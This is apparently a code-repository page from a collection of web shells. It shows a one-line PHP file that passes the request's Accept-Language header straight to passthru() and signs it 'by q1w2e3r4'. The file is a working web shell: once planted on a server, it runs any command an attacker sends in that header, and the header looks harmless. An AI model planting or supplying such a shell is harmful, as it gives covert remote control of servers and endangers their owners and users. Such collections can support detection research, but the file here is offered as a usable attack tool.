webshell/xakep-shells/PHP/accept_language.php.txt

2 lines
76 B
Text
Raw Normal View History

2014-05-18 01:06:34 +00:00
<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '<br> by q1w2e3r4'; ?>